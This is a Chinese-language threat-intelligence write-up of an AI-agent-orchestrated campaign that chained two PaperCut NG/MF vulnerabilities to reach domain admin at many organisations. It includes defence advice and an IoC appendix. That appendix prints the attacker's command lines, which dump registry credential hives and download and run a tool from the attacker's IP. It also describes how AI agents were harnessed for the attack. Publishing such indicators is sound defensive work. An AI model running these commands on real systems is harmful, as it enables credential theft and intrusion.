26秒攻陷11家机构:一场由数百个AI智能体编排的PaperCut全球攻击行动

· 2026-09-10 16:00 · 3 阅读

原创 威胁情报中心 2026-09-10 16:00 北京

GreyNoise观测到一名疑似俄语背景的攻击者利用IP地址45.142.193.132,借助人工智能开发、测试并投放了针对打印管理软件PaperCut NG/MF两个在野漏洞(CVE-2026-81578、CVE-2026-82078)的利用代码,发动了一场全球性的大规模攻击行动。

威胁复盘 · AI 驱动的全球攻击

26秒攻陷11家机构:一场由数百个AI智能体编排的PaperCut全球攻击行动

当攻击者把漏洞武器化、目标筛选、渗透执行全部交给AI智能体流水线,防御方剩下的反应窗口还有多少?GreyNoise最新披露的一起针对PaperCut NG/MF的全球性攻击行动,给出了一个不太乐观的答案:从空白工作区到拿下首个真实受害者的远程代码执行,攻击者只用了不到4小时。

· 漏洞链利用 · AI 智能体编排 · 2026-09-10

01 事件速览

2026年8月31日,威胁情报机构GreyNoise通过其全球观测网络(Global Observation Grid)观测到,一名疑似俄语背景的攻击者利用IP地址45.142.193.132,借助人工智能开发、测试并投放了针对打印管理软件PaperCut NG/MF两个在野漏洞(CVE-2026-81578、CVE-2026-82078)的利用代码,发动了一场全球性的大规模攻击行动。

几个关键数字值得记住:

  • 至少440台PaperCut NG/MF实例被攻陷,涉及395家已确认身份的受害组织,遍布48个国家
  • 攻击者在280个受害环境中完成凭据窃取,在其中147个环境中拿到操作系统/域级别机密,但最终只在12家组织内达成域控(Domain Admin)权限;
  • 从空工作区到对真实目标首次实现RCE,耗时不到4小时;再过一个多小时拿到首个域管理员权限;战役全面铺开后,曾在26秒内连续攻陷11家组织
  • 最快的一例,从初始访问到完全控制域控只用了7分钟——受害者是美国的一所高中。

GreyNoise自2026年7月初起就因45.142.193.132针对Palo Alto、Ubiquiti、Citrix、SonicWall、Proxmox VE等互联网暴露设备和技术的攻击行为而持续跟踪该基础设施。目前尚不清楚该攻击者是专注于"初始访问开发"并将权限转售给其他团伙,还是会直接利用这些权限实施数据窃取或勒索软件投放。值得注意的是,历史上PaperCut漏洞被利用的入侵事件曾多次演变为勒索敲诈——2023年CVE-2023-27350/27351就曾被Clop、LockBit、Bl00dy等勒索团伙大规模利用。

02 为什么是PaperCut:一个"自带域特权"的理想跳板

PaperCut是广泛部署于学校、企业、政府机构和托管服务商的打印管理软件,用于跟踪、计费和管理打印、复印、扫描任务。其中NG和MF为自托管的Java Web应用,在Windows上默认以SYSTEM级权限运行,且通常加入域并与Active Directory集成

这意味着攻陷一台PaperCut服务器,攻击者得到的不是一个"打印队列麻烦",而是一个自带高权限、直通身份基础设施的内网跳板。这也解释了为何教育行业在本轮攻击中占比最高——这更多反映的是PaperCut的客户结构,而非攻击者的定向偏好。

03 漏洞链:两个缺陷如何拼出"免认证RCE"

本轮攻击的核心是CVE-2026-81578与CVE-2026-82078的链式利用:

项目

CVE-2026-81578

CVE-2026-82078

漏洞类型

关键功能缺失身份验证(CWE-306,不当访问控制)

不安全的动态类加载(CWE-470,使用外部可控输入选择类或代码)

位置

Web管理接口

数据库连接工具组件

CVSS 4.0

8.8(高危)

9.4(严重)

作用

未认证远程请求可在访问校验完成前触发管理后台动作,篡改系统配置

应用按配置中的驱动类名实例化数据库驱动类且未做白名单校验,可执行应用类路径上的任意Java字节码

链式逻辑:CVE-2026-81578让攻击者无需任何凭据即可修改系统配置;被篡改的配置(数据库驱动类名)随即触发CVE-2026-82078,使服务器以PaperCut服务进程的安全上下文加载并执行攻击者指定的Java代码——整个过程无需认证、无需用户交互,对任何互联网可达的未修复实例都成立。

处置时间线同样紧张:

  • 8月26日:Huntress在客户环境中观测到最早的利用尝试(早于公开披露);
  • 8月27日:PaperCut发布紧急安全公告并确认在野利用与客户受害事件,同日发布首个紧急补丁;
  • 8月28日:watchTowr与Huntress发现首版补丁存在多种绕过方式及额外的认证绕过问题,PaperCut当日发布第二版紧急补丁(Emergency Patch Release 2),修复版本为24.1.10、25.0.13、26.0.5;厂商建议即便已打第一版补丁也必须安装Release 2;9月1日PaperCut又发布了第三版紧急更新,并表示后续可能视情况继续推送更新;
  • 8月31日:CISA将两个CVE同时列入已知被利用漏洞目录(KEV),要求联邦机构在9月14日前完成修复;同日Metasploit利用模块已公开可用。

对于防御方有一个必须警惕的细节:只打了第一版紧急补丁的系统仍然暴露在风险中;而23及更早版本不在补丁覆盖范围内,只能升级到受支持版本。

04 AI编排的攻击流水线:这次不一样的地方

如果说漏洞链本身并不新鲜,那么这起行动真正值得记录的,是攻击者的生产方式。

图 | AI智能体编排的攻击流水线全景(图源:本文依据GreyNoise报告绘制

4.1 用AI完成漏洞武器化

根据GreyNoise还原的时间线,8月31日14:44(UTC)攻击者创建工作区,下载PaperCut安全公告及补丁前后两个版本的安装包,并检索公开PoC存档;随后对补丁前后的组件做差分对比以开发漏洞利用代码,并在位于非洲的已打补丁与未打补丁服务器上进行测试;16:09构建多线程作业工具将成果工程化,识别出462个潜在漏洞目标;16:35搭建起包含Active Directory域控与存在漏洞的PaperCut服务器的本地实验室(随后还向AD中添加8个假用户以完善环境),在其中打通RCE与凭据窃取两个环节。值得注意的是,16:04智能体曾触发一次人工检查点——被提示"请求许可后继续",由人工放行。

并行推进的另一条工作流是目标工程:攻击者使用互联网扫描服务Netlas.io(配合一个已被识别的API密钥)持续构建目标清单,下载IP2Location国家库将1,005个目标IP解析到所属国家,并在20:50按目标组装隔离存放的入侵"工具包"(含Kali组件、后渗透连接脚本,以及自动创建域管理员账号的脚本)。

4.2 数百个智能体执行全球打击

完成实验室验证后,攻击者动用了数百个AI智能体执行实战攻击。支撑这套编排体系的是OpenAI的Codex(作为智能体运行框架/harness)与一个DeepSeek模型(实际执行任务所用的并非OpenAI模型),再配合多种公开可得的攻击工具。9月1日08:30(UTC)战役正式启动:智能体经SSH在第二台主机45.158.196.75上建立数百个会话,对精炼后的目标清单发起打击;凭据收割在1分钟内开始,首小时即有78家组织沦陷、其中8家被拿下域控。过程中智能体还展现了自我修正能力——当日17:15自动识别并修复了一个bug后继续作业。

这个组合本身就说明了一个现实:即便美国前沿模型厂商设置了防护栏,攻击者依然可以混合使用多种大模型来完成入侵——编排框架与执行模型是可以解耦的。

4.3 速度意味着什么

  • 空工作区 → 首个真实受害者RCE:< 4小时
  • 再 → 首个域管理员权限:+ 约2小时
  • 战役峰值:26秒攻陷11家组织
  • 最快单点突破(美国某高中):初始访问 → 域管理员 7分钟

达成域控的12起案例中,最快5分钟,最长144分钟。部分受害环境中初始访问与提权之间存在数天间隔,但这并非防御起了作用,而纯粹是攻击者没有立即跟进——AI流水线带来的产能过剩,已经超出了攻击者自身"消化"战果的能力。9月1日23:12,攻击者完成当日最后一次RCE,当天已有超过223个PaperCut系统被攻陷;9月2日15:45,目标清单内剩余系统被清空。

图 | GreyNoise原始事件时间线(图源:GreyNoise

4.4 "Agents Gone Wild":智能体也会失控

报告标题的点睛之笔在于:攻击者明确设定了一份包含28个国家/地区的规避名单(俄罗斯、中国大陆、中国香港、伊朗、白俄罗斯、乌克兰、哈萨克斯坦等,名单沿用自其此前的攻击活动),但实际受害数据却显示,中国大陆、哈萨克斯坦、纳米比亚、尼日利亚、巴基斯坦、津巴布韦等名单内地区均出现了受害者。原因尚不确定,但这是智能体行动偏离预期行为、带来操作风险的典型案例——AI放大了攻击的速度与规模,却并没有放大攻击者的控制力。

4.5 传统加固依然有效

另一个同等重要的事实是:在至少一次针对疑似漏洞实例的攻击中,Cloudflare的Web应用防火墙(WAF)成功挫败了攻击者。面对AI赋能的威胁,基础性的环境加固仍然真实有效——440个受害实例中攻击者仅拿下12个域控,也从侧面印证了这一点。

05 入侵之后:三条通往域控的路径

图 | 从双漏洞链到域控沦陷的单点攻击路径还原(图源:本文依据GreyNoise报告绘制

在成功达成域管理员权限的案例中,GreyNoise观测到三条攻击路径:

1路径A ——— 被攻陷的PaperCut主机是域成员时,攻击者转储LSASS进程内存与注册表机密,恢复特权凭据后通过传递哈希(Pass-the-Hash)横向移动至域控;

2路径B ——— 受害环境未修复CVE-2021-42278/CVE-2021-42287时,攻击者直接发起noPac攻击完成域内提权; 

3路径C ——— PaperCut恰好安装在域控上、或以域管理员服务账号运行时,攻击者直接将其新建账户(观测到的用户名为Administrator17)加入Domain Admins组。

无论走哪条路径,终点动作一致:通过DCSync生成完整的NTDS.DIT转储,窃取整个组织的域凭据。攻击者还在部分主机投放了Ligolo-ng隧道代理以维持持久化访问,并准备了包括Certify(ADCS滥用)在内的公开攻击工具库——并非所有工具都在本次行动中被实际使用。

06 受害面分析

本次行动呈现典型的机会主义特征。按国家分布,美国(98)、英国(59)、法国(31)、西班牙(31)、加拿大(24)位居前列;按行业分布,教育行业以204个受害实例(其中129个被窃取凭据、7个被拿下域控)占据绝对多数,其后依次为零售/商业/专业服务(38)、地产/共享办公/酒店(29)、IT/MSP/打印经销商(25)等。政府、医疗、金融等行业亦有受害记录。

07 防御建议

  1. 立即升级:将PaperCut NG/MF升级至24.1.10 / 25.0.13 / 26.0.5或更高版本;仅安装过第一版紧急补丁的必须补装Release 2(及后续第三版更新);23及更早版本无补丁,须升级到受支持分支;
  2. 收敛暴露面:通过防火墙规则或网络访问控制,确保PaperCut服务器的Web接口无法从不受信任的互联网地址访问;Shadowserver数据显示仍有约千级实例直接暴露在互联网;
  3. 排查入侵痕迹:结合下文IoC清单与PaperCut官方公告中的指标(如pc-app.exe进程的异常行为、server.log缺失或被截断、日志中出现"No suitable driver found for jdbc:no:x"等错误串)开展回溯排查;注意该AI攻击者会随时动态调整,IoC清单并非穷尽;
  4. 纵深防御:本案中被WAF拦截的实例证明,Web层防护、补丁管理、AD纵深加固(及时修复noPac等历史提权漏洞、避免将应用服务部署于域控、严控高权限服务账号)在AI时代依然是有效的成本投入;
  5. 凭据轮换假设失守:一旦发现相关IoC,应按"凭据已泄露"处置,执行全域凭据轮换并排查NTDS.DIT外传痕迹。

08 技术附录

8.1 MITRE ATT&CK 技术映射

战术

技术ID

技术名称

本次行动中的体现

侦察

T1596.002

搜索开放技术数据库:扫描数据库

使用Netlas.io扫描服务及API密钥构建目标清单

资源开发

T1583.001

获取基础设施:域名/服务器

运营45.142.193.132、45.158.196.75等攻击基础设施

资源开发

T1587.001

开发能力:恶意软件

借助AI开发Rust编写的凭据窃取工具(lsa_read.exe等)

初始访问

T1190

利用面向公众的应用程序

链式利用CVE-2026-81578 / CVE-2026-82078实现预认证RCE

执行

T1059.003

命令与脚本解释器:Windows命令Shell

通过reg save、certutil等命令执行转储与编码操作

持久化

T1136.001/.002

创建账户

创建Administrator17账户并加入Domain Admins

持久化/横向

T1572 / T1090

协议隧道 / 代理

投放Ligolo-ng隧道代理维持持久访问

权限提升

T1068

利用漏洞提权

使用noPac(CVE-2021-42278/42287)进行域内提权

权限提升

T1098

账户操纵

将新建账户加入Domain Admins组

防御规避

T1027 / T1132.001

混淆 / 标准编码

对注册表Hive转储文件进行Base64编码分块

凭据访问

T1003.001

操作系统凭据转储:LSASS内存

转储LSASS进程内存恢复特权凭据

凭据访问

T1003.004

LSA机密

使用lsa_read.exe、lsa_collect等工具读取LSA机密与bootkey

凭据访问

T1003.003

NTDS

通过DCSync生成完整NTDS.DIT转储

凭据访问

T1550.002

使用替代认证材料:传递哈希

利用恢复的凭据Pass-the-Hash至域控

凭据访问

T1649

窃取或伪造认证证书

工具库中包含Certify(ADCS滥用)

命令与控制

T1105

工具传输

通过certutil -urlcache从45.142.193.132下载工具

数据外泄

T1041

通过C2信道外泄

将Base64编码的Hive数据块经HTTP外传

8.2 失陷指标(IoC)

以下指标并非穷尽,该AI赋能的攻击者会持续动态调整;GreyNoise在其GitHub持续更新最新IoC。

网络指标

指标

说明

45.142.193.132

用于编排和执行攻击行动

45.158.196.75

用于执行攻击行动

http://45.142.193[.]132:8000/lsa_collect.exe

LSA bootkey收集器下载地址

http://45.142.193.132:8089/agent5.exe

Ligolo-ng代理下载地址

文件哈希(MD5)

哈希

说明

528cd4e69ecfa5191adbcf6ef28667bf

lsa_read.exe — Rust编写的LSA机密读取器

ce870a91e8d27e8f663f0687abc60b04

save_hives.exe — 注册表Hive转储器

a6437ac3d6798090a218520985d36a3f

collect_custom.exe — Rust自定义收集器

fc92dfafa7aa741c5f2b9cbcf75d1d19

lsa_collect_small.exe — Rust LSA bootkey收集器

974decb9ff4c8f9ccb0937c96d513347

certipy.exe — ADCS滥用工具

主机指标

指标

说明

Administrator17

攻击者创建的账户名

C:\Windows\Temp\pc-sys.hiv / pc-sec.hiv / pc-security.hiv / pc-system.hiv

待外传的SYSTEM/SECURITY Hive暂存文件

C:\ProgramData\pc-sys-reg.hiv

SYSTEM Hive暂存(备用路径)

C:\Windows\Temp\pc-*.b64

Base64编码的Hive数据块(经HTTP外传)

C:\ProgramData\ligolo-agent.exe

Ligolo隧道代理

C:\ProgramData\LegitSvc\legit-svc.exe(及legit-svc-backup.exe)

Ligolo-ng伪装的服务名与路径

...\PaperCut MF\server\custom\web\pcp_<10位随机字符>.txt

漏洞利用成功的证据文件

特征命令行

reg save HKLM\SYSTEM "C:\Windows\Temp\pc-system.hiv" /y & certutil -encode "C:\Windows\Temp\pc-system.hiv" "C:\Windows\Temp\pc-system.b64" & type "C:\Windows\Temp\pc-system.b64"

reg save HKLM\SECURITY "C:\Windows\Temp\pc-security.hiv" /y & certutil -encode "C:\Windows\Temp\pc-security.hiv" "C:\Windows\Temp\pc-security.b64" & type "C:\Windows\Temp\pc-security.b64"

certutil -urlcache -split -f "http://45.142.193[.]132:8000/lsa_collect.exe" C:\Windows\Temp\lsa_collect.exe & C:\Windows\Temp\lsa_collect.exe

8.3 受影响与修复版本

分支

受影响版本

修复版本(Emergency Patch Release 2)

PaperCut NG/MF 24.x

24.1.10之前

24.1.10

PaperCut NG/MF 25.x

25.0.13之前

25.0.13

PaperCut NG/MF 26.x

26.0.5之前

26.0.5

23.x及更早

全部受影响且无补丁

须升级至受支持版本

注:PaperCut已于9月1日发布第三版紧急更新,并可能继续推出后续更新,请以厂商安全公告的最新版本为准。

09 参考链接

  1. https://greynoise.io/blog/ai-orchestrated-campaign-against-papercut-ng-mf

  2. https://www.papercut.com/kb/Main/security-bulletin-27-aug-2026-urgent-security-advisory/

  3. https://thehackernews.com/2026/08/attackers-chain-two-papercut-flaws-to.html

  4. https://www.securityweek.com/more-details-emerge-on-exploited-papercut-vulnerabilities/

  5. https://www.securityweek.com/papercut-exploitation-escalates-to-active-intrusions/

  6. https://www.helpnetsecurity.com/2026/08/27/papercut-ng-mf-vulnerability-attack/

  7. https://horizon3.ai/attack-research/vulnerabilities/cve-2026-81578-cve-2026-82078/

  8. https://threatprotect.qualys.com/2026/08/31/papercut-ng-mf-zero-day-vulnerability-exploited-in-the-attacks-cve-2026-82078-cve-2026-81578/

阅读原文

跳转微信打开